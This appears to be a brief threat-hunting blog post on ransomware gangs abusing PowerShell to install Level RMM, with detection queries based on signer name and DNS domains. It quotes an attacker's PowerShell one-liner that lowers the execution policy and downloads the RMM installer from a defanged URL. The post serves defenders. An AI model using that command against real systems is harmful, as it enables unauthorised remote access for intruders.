184. Ransomware Gangs Abuse PowerShell to Install Level RMM
Hello everyone!
RMMs. Yes, again. This one isn't new, but I don't see it often enough, so I decided some detection and hunting ideas for it. I'm talking about Level RMM.
According to this report, the adversary leveraged PowerShell to download the installer:
powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile;
The executable is signed by Level Software, Inc. Why not to use it for detection?
event_type: "processcreatewin"
AND
proc_file_sig: "Level Software"
Another detection opportunity is searching for Level RMM-related domains:
event_type: "dnsreqwin"
AND
dns_rname: ("level.io" OR "rmm.dev")
See you tomorrow!
Comments
Post a Comment